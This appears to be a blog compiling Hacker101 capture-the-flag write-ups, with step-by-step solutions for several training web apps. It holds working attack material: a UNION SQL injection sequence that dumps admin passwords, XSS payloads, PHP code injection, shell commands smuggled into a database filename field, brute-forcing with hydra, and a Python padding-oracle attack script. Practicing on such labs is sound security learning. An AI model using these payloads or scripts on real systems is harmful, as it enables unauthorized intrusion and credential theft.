I am going to do a live stream covering the install and why I’ve chosen Slackware Linux over many user friendly distro’s out there.

Follow me on twitch / dlive for when I do go live.

Flag 0

• burp suite intercept, change the %3A+7.95%2C to %3A+0%2C and let it load
• Flag 0 found, this is easy!

Flag 1

• Locating the admin interface login, off the top of my head, I used admin, Admin, ps-admin, login and bingo found /Login
• Used repeater  and dumped the user name github is a good place to get a common usernames list.
• get a list for the passwords to, this will take a while let. I used.. hydra for this task built a script to dump the username, password, This one took about an hour.
• found user/password combo and logged in
• Flag 1 found brute force was the key here.

Flag 2

• This one relayed upon XSS exploit, so you need to dump  it as the user go edit a product and add the following. <img src=x onerror=alert(1)> in the name and description and hit save.
• Add the product to to the shopping cart and check out.
• Flag 2 found during check out.

Flag 0

• Review the demo, and take notes how this is all setup.
• View the live now.
• demo and live look exactly the same in the code wise.
• Admin Login -> attempt admin / admin but shouldn’t work.
• Jump to submit a ticket  and add in this information to inject some code and see if it works
• <a href=”http://localhost/newUser?username=test&password=test&password2=test”>TEST</a>
• Now login with the new account
• Read the Flag wont work.
• Flag 0 found

Flag 1

• use burp suite to find the request, we will focus on ticket?id=1 and dumping the admin login creds.
• ticket?id=1′ -> shows that it is running mysql database but we got an error message, lets run down a quick list.
• Lets try this one, ticket?id=1 AND 1=1 *this one works* no flag tho, but ticket?id=1 AND 1=2 does not.
• Lets see if we can find the table numbers.  ticket?id=1 AND 1=1 ORDER BY 10, does not work but ticket?id=1 AND 1=1 ORDER BY 3 does. ticket?id=1 AND 1=1 ORDER BY 4 error out. Sooo lets union select.
• ticket?id=1.1 UNION SELECT 1,2,3– shows the 1,2, our rreply, 3
• Lets do some fun, lets see if we can drop a version of the database
• ticket?id=1.1 UNION SELECT VERSION(),DATABASE(),3–
• now lets get a table name
• ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()–
• This should show 2 tables, one we want “users”
• Lets drop the column_name
• ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME=’users’–
• This will drop the id, username, password.  Oh we are close to admin now!
• ticket?id=1.1 UNION SELECT 1,password,3 FROM users WHERE username=’admin’–
• Flag 1 found
• I just learned something, we could of just have done this. the easier way.
• Burp suite > read the GET post, save that to a file and use sqlmap -r therequest.txt –dump

Flag 0

• Hint -> don’t use common user / password combo’s
• sign’d in as user / password as both the user and password
• Flag 0 found

Flag 1

• as use view the post
• index.php?page=view.php&id=1
• copy that and change the id to 2
• flag 1 found

Flag 2

• Create a new post use burp suite from here
• and use intercept it before creating a post, check and modify the user_id value=”2″ to value =”1″  release the intercept and the webform posts as admin.
• Flag 2 found

Flag 3

• The hint gives a number to multiply with 189 * 5 that = 945
• lets review 945
• index.php?page=view.php&id=945
• Flag 3 found

Flag 4

• Use burp’s intercept again,
• edit the post and hit save besure to have  intercept on so you can change id=3 to id=1 hit
• flag 4 found

Flag 5

• burp intercept this time we are modifying cookies, you would need to md5 to find out value 1 is. You will need to logout and relogin as user and intercept that login so you can also snag that cookie.
• Take the current cookie from burp and it should be cookie id and resolve to number 2 as the md5 value.
• when you get the md5 value for 1, paste it in the interception area for burp and release to change the cookie id value.
• Flag 5 was found as you have went from user to admin.

Flag 6

• Now lets intercept when you attempt to delete a post
• again it uses md5 values when deleting posts, so change the value to 1’s md5 value.
• Flag 6 found, When you release it should drop another flag when you visit the post



Flag 0

• Toooo much information was given on the first step. If you red it right, you have 2 red flags already 1, it’s php and second include() nothing wrong with PHP per-se, just when you are first time into it, you make alot of security mistakes.
• XSS wont pass in here, tried but this wont work here.
• but if you didn’t close a few commands in the backend, try to pass some php code as an html format and see what you get?
• ie: in the comments type <?php phpinfo()?>
• Flag 0 found  geez that was too easy.

Flag 1

• All cms / blog systems have an admin interface, I mean it’s a way to control a blog content management system.
• I used burp suite for this to investigate what goes where and what gets executed and I found ?page=admin.atuh.inc
• Found user/password
• Lets do something extremely silly as this is “Cody’s first blog” after all lets see if he made a mistake, remove auth and use ?page=admin.inc
• Flag 1 found

Flag 2

• using burp suite to see more of what gets passed thru.
• Idea for this one is to use php blind injection to read the index.php source.
• pop in this command, this took me a bit to find as it’s been a while since I’ve used php.
• <?php echo readfile(“index.php”)?> in the comments like in flag0
• check the source (or use burp to see the source)
• Flag 2 found in the index.php source.

Flag 1)

• Start off by viewing the source and you will get id’s
• so lets view fetch?id=1 and you should see a direct image
• add an .1 to it ie: fetch?id=1.1 and it should error out
• but lets pass some sql commands to push an arbitrary file read, using UNION SELECT ‘file/adorable.jpg’ —
• This should drop the image information pay good attention to it and you will find another hint to this running the uwsgi-nginx-flash-docker.
• Change the filename from file/adorable to uwsgi.ini as uwsgi will have an ini file for it’s config.
• Learn of the main file name from this config and use that instead of uwsgi.ini ie it should show main.py
• now review the main.py
• flag 0 found.

Flag 2)

• This one is easy, if you use Slackware like I have and installed the source package, you will need to drop the image from sqlmap using a blind injection
• sqlmap -u usr/fetch?id=1 –dump
• Flag 1 is found

Flag 3)

• Using remote code execution, rename image 3 to a new name call it test
• Command: fetch?id=1;UPDATE photos SET title=’test’ WHERE id=3;COMMIT;–
• broken image 3 is now named test
• Command 2:  fetch?id=1;UPDATE photos SET filename=’* || ls > test’ WHERE id=3;COMMIT;–
• this should now show after checking it again with fetch?id=1.1 UNION SELECT ‘test’ —
• command 3: fetch?id=1;UPDATE photos SET filename=’* || env > test’ WHERE id=3;COMMIT;–
• run this again fetch?id=1.1 UNION SELECT ‘test’ —
• all 3 flags are now found.  Flag 2 is the last one.

note: Keep in mind, I have had over 20+ years in cyber security, I started out as a blackhat in the golden age of insecure internet. I also ran Slackware Linux since 1998 as my main OS so this is a double challenge with Hacker101 and Doing it all from Slackware Linux (NO Kali Linux ewww.) 

This one needed attention as this is both easy but yet it is hard.

Couple of things I’ve learned from this one is that You have to focus on what this is actually vulnerable to…  the CVE is there so you have to keep that in mind this isn’t all about Nostalgia
Tools used here:

• Padbuster
• Custom Python Scripts

What do we know?

• From the obvious, AES-128 CBC
• Not SSL (https)
• Doesn’t get stored in a database
• url/ dymanic directory / dymanic query?post=dynamic encrypted key.
• 4 exploits are to be found here for 4 ^FLAGS^

• Flag 1

This one is a given, the easiest of them all. Just delete a character in the encrypted key and it dumps the first flag but it also dumps alot of RICH information, I highly recommend to always pay attention to detail.

• Flag 2

FIrst clue was the Incorrect padding, this right of the bat we now know this is a poodle attack or something similar. Thanks to kali linux I found PadBuster that took care of this attack with decrypting the AES-128 that would also dump the key and the second flag.

• Flag 3

This clue is to know about the padded oracle attack that the first one was to decrypt it via Chain Blocking, this side I needed to decode it again with a Stream, RC4 Style. But… any tools I can find required an not encrypted key…. so I had to build something, that would cross, this took hours of running flag 2 over and over and how the data is being decrypted.  So in thought lets see if I can use the website to decode it for me.

My thought was {Flag: ^flag2^ id: x , key: dynamic key} a clue,
and b64d = lambda x: base64.decodestring(x.replace(‘~’, ‘=’).replace(‘!’, ‘/’).replace(‘-‘, ‘+’)) was placed right there oh heck another clue I found was post = json.loads(decryptLink(postCt).decode(‘utf8’)).

So, I couldn’t find a tool I had to decode this in a streamline fashion.
In Python, I wrote. (test3)

import base64 //because base64
import requests //using requests with web forms.

Decode the data defined.
def decode(data):
return base64.b64decode(data.replace(‘~’, ‘=’).replace(‘!’, ‘/’).replace(‘-‘, ‘+’))

Re-encode the data defined,
def encode(data):
return base64.b64encode(data).decode(‘utf-8’).replace(‘=’, ‘~’).replace(‘/’, ‘!’).replace(‘+’, ‘-‘)

#Remember XOR: was a hint, so we need to use XOR not decrypt it.
#So defining Bit XOR.
def bxor(b1, b2): # use xor for bytes
result = b””
for b1, b2 in zip(b1, b2):
result += bytes([b1 ^ b2])
return result

#now define the url padding.
def test(url, data):
r = requests.get(url+’?post={}’.format(data))
if ‘PaddingException’ in r.text:
return False
else:
return True

#now to define the iv calculations
def generate_iv_list(tail):
iv = b’\x00′ * (16 – len(tail) -1)
return [iv+bytes([change])+tail for change in range(0x00, 0xff+1)]

#last is now we need to define the padding oracle.
def padding_oracle(real_iv, url, data):
index = 15
plains = bytes()
tail = bytes()
while index >= 0:
for iv in generate_iv_list(tail):
if test(url, encode(iv+data)):
plains = bytes([(16-index) ^ iv[index]]) + plains
index -= 1
tail = bytes([plain ^ (16-index) for plain in plains])
break
return bxor(real_iv, plains)

now with some trial and error I came up with this.
post = ‘original encrypted dynmaic data’
data = decode(post)[16*(1+5):]
iv_6 = decode(post)[16*(1+4):16*(1+5)]
immediate = bxor(b’$FLAG$”, “id”: “‘, iv_6)
iv = bxor(immediate, b'{“id”:”1″, “i”:”‘)
print(encode(iv+data))

This dumped data, encrypted but it was like in reverse and I took that and when used in the ?post= dropped flag 3 with another error.

• Flag 4

Now this one caught me with if they didn’t store data in an sql database doesn’t mean they don’t use SQL for defining data.

So we need to basically brute force attack the decryption using their stuff, using a SQL Injection.  Here is what I wrote.

if __name__ == ‘__main__’:
url = ‘http://URL/Dynamic Folder/’
post = ‘Dynamic Encrypted Post’
ciphertext = decode(post)[16*6:16*7]
immediate = bxor(b’$FLAG$”, “id”: “‘, decode(post)[16*(1+4):16*(1+5)])

plains = ‘{“id”:”0 UNION SELECT group_concat(headers), \’\’ from tracking”,”key”:”Dynamic Enc Key”}’
data = pad(plains.encode(‘utf-8’), 16)
block_amount = int(len(data) / 16)
index = block_amount
while True:
block = data[(index-1)*16: index*16]
print(‘meow：’)
print(block)
iv = bxor(immediate, block)
ciphertext = iv + ciphertext
index -= 1
if index > 0:
immediate = padding_oracle_decrypt(url, iv)
else:
break
print(encode(ciphertext))

This one threw me off because it dropped another key, this key dropped a new error that I didn’t pick up until I kept running it a few times (each time took over an hour)
but the error also http://127.0.0.1/url/?post=Another Encrypted Data Dynamic Key.
So I took that new encrypted data key and it dropped Flag 1 and a new flag 4.

note: Keep in mind, I have had over 20+ years in cyber security, I started out as a blackhat in the golden age of insecure internet. I also ran Slackware Linux since 1998 as my main OS so this is a double challenge with Hacker101 and Doing it all from Slackware Linux (NO Kali Linux ewww.) 

Lets turn up the heat,

You will need a few tools on this one, easiest if you are lazy like I am and don’t want to re-invent the wheel.

Tools I played around with at first is you will need to get the database information and to do that, you need data and alot of it…. this is 2020, not 1999 so I don’t need to setup squid or a proxy server to LOG everything I send in and out…. no way… I am running slackware and on a VM because I am streaming this live on twitch.tv. SO what distro people use these days? and I talk shit about? kali linux, I talk shit about it because how easy it is to make available for kids to get a hold of and do stuff with out learning why?  but like all linux distros, you can get the source and compile it.

First tool I started with, is MITMProxy because they say this is a hard tool to use. But I beg to differ, this tool was 10x easier than setting up a squid proxy server and shift through logs and you can inject with out modding the proxy server.   But this is console base, I can sit for days shifting through features as I am loving it.

I moved to Burp Suite because it’s the same damn tool just with more stuff but it’s all GUI base and…. icky java! ewww….  anyways I pick up on software easy super easy especially if it is GUI based, I am a hands on person.  I do the same thing inject and we can also decode / encode and other features and such… only thing I really hate about this software is that this isn’t fully open source software and they charge money and stuff for other useless features well at least for me, I guess if your some kid who got their degreed in cyber security might need it for corporation standards I guess. Pretty much everything you can do in Free version of Burp you can also do in MITMProxy with mods.

SQLMap, now this console tool is fun to play with, it can dump tables, id’s, and the content displayed inside including decoding the basic encryption for password field but it is all just an automation for many different SQL Injection flaws out there.

Back to  this CMS system, it’s a different setup but still same same.

• Flag 1 – We have a login for editing or creating a new page so this CMS security has stepped up a bit.  Ok, lets see if this is as easy as it has been, lets use admin / admin as the user/pass, or root/root all showing unknown user.  I accidently hit ‘ and hit enter when guessing common user and password combos but I got an error with this…

if cur.execute(‘SELECT password FROM admins WHERE username=\’%s\” % request.form[‘username’].replace(‘%’, ‘%%’)) == 0:
File “/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py”, line 255, in execute
self.errorhandler(self, exc, value)
File “/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py”, line 50, in defaulterrorhandler
raise errorvalue
ProgrammingError: (1064, “You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”’ at line 1″)

Now there is something they do use MySQL.. mm and I broke it on accident with ‘
I have been working in SCCM alot for the past few years so knowing sql commands is something,

So, lets create a command because this error tells me that I can execute a sql command.
Username ” ‘ UNION SELECT ‘111’ AS password#
password “111”
and I am in! now click on a new link “private page” that page turns into your first flag.

• Flag 2  Now lets use a tool MITMProxy or Burp, what ever you want to see.
  I started to stream this in the past week, where I played with both and got this flag.What I was doing was seeing if I could intercept the forms and change the response,  I ended up editing a page and letting both Mitmproxy and burp was able to log the request, and resubmit the request turning a Get command to a Post and from there I got the second flag.  This one was to show or demonstrate the interception  with an MITM attack could do some stuff.
• Flag 3  This one, got me a bit as I started to review both MITMProxy and Burp Suite to see what I could find if I could find something.
  the hint I reviewed was “Credentials are secret, flags are secret. Coincidence?”
  So, I digged more and more into the requests back and forth modify both in and out of the requests but only ended up with flag2… including different ways to inject ‘1=1#  so at this point I needed a username and password.  I loaded up SQLMap and let it dump the tables with the rows and I ended up dumping a whole username  and passwords, and I used one of them that got me Flag number 3.

note: Keep in mind, I have had over 20+ years in cyber security, I started out as a blackhat in the golden age of insecure internet. I also ran Slackware Linux since 1998 as my main OS so this is a double challenge with Hacker101 and Doing it all from Slackware Linux (NO Kali Linux ewww.) 

Thoughts: Have you ever sat at a website and messed around with directories ? or custom switches?   or even crawled a website like using wget -m and mirrored everything and seeing a alot of directories and it’s randomness and you stumble upon random stuff and some stuff you really wished you didn’t like porn, warez etc..  well I didn’t use wget per-se here but I did mess around with this, not everything is linked.

This is a micro cms, it’s a lightweight content management system, typically every newbie web developer who wants to make a cms system starts here.

Note: hey I helped developed one for my old ISP, Hey! this should be a walk in the park.

• Flag 1, lets find it.
  – I started off by creating a new page, to learn the system, now edit that page, (Keep an eye on the ID’s given)  lets view that page? lets change the id given (http://url/dynamic folder/page/Id) assuming you where assigned as like I was at ID 9, and change that to 8, lets walk it up from 8 to 1 and view all these pages.

Note: One of these will show an Forbidden permission page. Remember that ID, for me it was ID7.

Lets go back to your page, edit your page it should show: (http://url/dynamic folder/page/edit/9)  now lets test that permissions of page 7? because remember this is a exploitation of security so lets break stuff shall we?  it should show: (http://url/dynamic folder/page/edit/7)

Found the Flag!

• Flag 2

Lets add a character, this normally breaks stuff

View page 1  (http://url/dynamic folder/page/1)
add ‘ to the end of the 1 (http://url/dynamic folder/page/1’) now this should break the page.

Now edit page 1. : (http://url/dynamic folder/page/edit/1)
lets do it again add ‘ to the end of page 1.
(http://url/dynamic folder/page/edit/1’)
Instead of breaking, it dropped a flag!

• Flag 3

Ok, this is something I’ve heard about for a while cross site scripting.
-> Give a heads up check out this for more information. https://www.nuharborsecurity.com/alertxss-pwn3d-real-dangers-cross-site-scripting/

Edit page 1, add a script snippet, this needs to use the Alert – XSS cross site scripting or I call it the Alert X-Ass… (http://url/dynamic folder/page/edit/1)
add in the title and body <script> Alert ‘XSS'</script>
Now save it and hit “Go Back”

Should error out and give you Flag 3 as it did for me!

• Flag 4

This is similar with Flag 3 but this one needs a bit of creativity,
do you remember when I said find the id’s and count down, you seen that adorable kitty on page 2 just like I did? (http://url/dynamic folder/page/2)

Lets edit this one!  since we have done ID7 and 1, 8, 4,3,5,6 are all dead and doesn’t exist.
(http://url/dynamic folder/page/edit/2)

Note: Being a web developer in the past, you know if you add things that could interfere such as adding another script call this one brought me back to the early days of geocities in the late 90’s as I wrote a page people went to that looped back this button.

Add in this command <button onclick=alert(1)>  Kitty Button, CLICK ME!!!! </button>
Hit save and click the button and this alert should error out because you know bad java scripting.  Now check your dev tools (hint: F12) back it these days Netscape was the only browser that had this feature. but back then it didn’t show a button flag, instead it used to display java script errors or break the whole site or depends on how you have coded your site, you could have looped that button click a lot of times instead. In the dev tools you will see the last flag^

Now we are getting nostalgic, this is how H101 got me hooked with this nostalgic

note: Keep in mind, I have had over 20+ years in cyber security, I started out as a blackhat in the golden age of insecure internet. I also ran Slackware Linux since 1998 as my main OS so this is a double challenge with Hacker101 and Doing it all from Slackware Linux (NO Kali Linux ewww.) 

1/1 Complete.

Note: Being in the web development for a good chunk of my life really shows here.

This one looks like a normal basic site, so this has to be easy, So I just view the source and what do I see? a background image file but it didn’t change the background. Hmm? lets open that file directly and take a peek.

And the image displays the ^flag^xxxxxx..